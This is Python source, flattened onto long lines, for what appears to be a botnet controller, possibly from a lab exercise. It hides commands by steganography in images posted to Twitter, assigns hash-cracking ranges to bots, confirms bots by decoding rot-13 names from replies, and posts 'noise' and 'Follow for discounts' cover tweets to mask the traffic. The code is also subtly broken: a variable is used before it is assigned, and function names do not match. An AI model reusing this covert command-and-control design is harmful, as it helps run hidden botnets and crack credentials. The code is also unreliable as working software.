def manage_calulate_replies_helper(handeling_ranges, bot_replies, command_params, hash_algorithm): global HASH_BREAK_FOUND global HASH_FUNC for reply in bot_replies: if 'For more by me follow the link:' in reply: # Hash was found tell all bots print("HELLO") ccp_support.update_feedback( '[!!!] The has was found, telling bots and stopping calculations' ) print("HELLO") mix = reply.replace( 'For more by me follow the link:', '') solved_hash = mix.split('/')[0] status, filename = post_constructor.get_post() result = utility.hide(filename, 'HashFound') if result: streamer.HandlePost.post_tweet(filename, status) print("HELLO") ccp_support.update_feedback('The cracked hash: ' + solved_hash.replace('@roylccp ', '')) print('Found') HASH_BREAK_FOUND = True return if 'Check me out on: ' in reply: # Bot didnt solve in range ccp_support.update_feedback('[-] Retrieved reply ' + reply) ccp_support.update_feedback( '[!] A bot hasn\'t found the hash within the given range, giving a new range' ) mix = reply.replace(r'Check me out on:', '') bot_name = mix.split('/')[1] # ccp_support.update_feedback(bot_name, 'Calculate', command_params, hash_algorithm, handeling_ranges[0]) message, ranges_left = construct_command([bot_name], 'Calculate', command_params, hash_algorithm, handeling_ranges[0]) print('[-] Posting ' + message) handeling_ranges = ranges_left[1:] status, filename = post_constructor.get_post() result = utility.hide(filename, message) if result: now = current_time = now.strftime("%H:%M:%S") streamer_bot.HandlePost.post_opener_tweet( 'Follow for discounts. ' + current_time) streamer.HandlePost.post_tweet(filename, status)
def direct_control(): # message = 'LAB40-19 Calculate#900150983cd24fb0d6963f7d28e17f72#abc#4' # result = utility.hide('apple.png', message) # HandlePost.post_tweet('apple.png', 'TEST') result = utility.hide(DEFAULT_PICTURE_FILE, 'LAB40-19 HashFound') if result: streamer.HandlePost.post_tweet(DEFAULT_PICTURE_FILE, '[]')
def make_noise(): print('Making noise') time.sleep(10) if not ccp.HANDLER_THREAD_RUNNING: ccp_support.update_feedback('Generating noise while idle') status, filename = post_constructor.get_post() result = utility.hide(filename, 'Noise') if result: streamer.HandlePost.post_tweet(filename, status) while True: print('Waiting') time.sleep(random.randint(1800, 3600)) if not ccp.HANDLER_THREAD_RUNNING: status, filename = post_constructor.get_post() result = utility.hide(filename, 'Noise') if result: streamer.HandlePost.post_tweet(filename, status)
def confirm_bots(num_of_replies=5): active_bots = [] status, filename = post_constructor.get_post() result = utility.hide(filename, 'Confirm') if result: now = current_time = now.strftime("%H:%M:%S") streamer_bot.HandlePost.post_opener_tweet('Follow for discounts. ' + current_time) streamer.HandlePost.post_tweet(filename, status) else: ccp_support.update_feedback( '[!] Something went wrong while hiding the message in: ' + filename) return time.sleep(20) # temp = streamer.TwitterClient() temp = streamer_bot.TwitterClient() bot_replies = streamer_bot.TwitterClient.get_user_timeline_replies( temp, num_of_replies) ccp_support.update_feedback(bot_replies) # If no bots were found try again if not bot_replies: time.sleep(40) streamer.HandlePost.post_tweet(filename, status) time.sleep(20) bot_replies = streamer_bot.TwitterClient.get_user_timeline_replies( temp, num_of_replies) if not bot_replies: ccp_support.update_feedback('[*] API problem try again later.') return [] for confirmation in bot_replies: ccp_support.update_feedback('[-] ' + confirmation) confirmation_split = confirmation.split(' ----> ') bot_name = confirmation_split[0][confirmation_split[0].index(':') + 2:] encoder = codecs.getencoder('rot-13') bot_name = encoder(bot_name) bot_name = bot_name[0] active_bots.append(bot_name) return active_bots
def start_handler(hash_algorithm, params): global HASH_BREAK_FOUND ccp_support.update_feedback('Started') ccp_support.update_feedback('Confirming bots') active_bots = confirm_bots() if active_bots == []: time.sleep(10) return ccp_support.insert_bots(active_bots) ccp_support.update_feedback( 'Done confirming bots, fetched list of active bots: ') # active_bots = ['DESKTOP-RSN4T39'] ccp_support.update_feedback(active_bots) command = 'Calculate' params = params.split('#') message, ranges_left = construct_command(active_bots, command, params, hash_algorithm) ccp_support.update_feedback('[-] ' + message) # if input('[?] Exit? ') == 'y': # return status, filename = post_constructor.get_post() result = utility.hide(filename, message) if result: ccp_support.update_feedback('Image has been encoded') now = current_time = now.strftime("%H:%M:%S") streamer_bot.HandlePost.post_opener_tweet('Follow for discounts. ' + current_time) streamer.HandlePost.post_tweet(filename, status) else: ccp_support.update_feedback('Bad image mode') return # In case of the calculate command continue listening for replies and instruct if command == 'Calculate': manage_calculate_replies(ranges_left, params, hash_algorithm) HASH_BREAK_FOUND = False ccp.HANDLER_THREAD_RUNNING = False print('HANDLER DONE')
def main(): global HASH_FUNC banner_print.print_banner() print('[!] Started') print('[!] Confirming bots') active_bots = confirm_bots() print('[!] Done confirming bots, fetched list of active bots: ') # active_bots = ['DESKTOP-RSN4T39'] print(active_bots) if input('[?] Exit? ') == 'y': return command = input('[?] Input the command: ') hash_algorithm = input('[?] Input the hash algorithm: ') HASH_FUNC = hash_algorithm params = input('[?] Input parameters split by a #') params = params.split('#') message, ranges_left = construct_command(active_bots, command, params, hash_algorithm) print('[-] ' + message) # if input('[?] Exit? ') == 'y': # return status, filename = post_constructor.get_post() result = utility.hide(filename, message) if result: print('[!] Image has been encoded') now = current_time = now.strftime("%H:%M:%S") streamer_bot.HandlePost.post_opener_tweet('Follow for discounts. ' + current_time) streamer.HandlePost.post_tweet(filename, status) else: print('[*] Bad image mode') return # In case of the calculate command continue listening for replies and instruct if command == 'Calculate': manage_calculate_replies(ranges_left, params, hash_algorithm)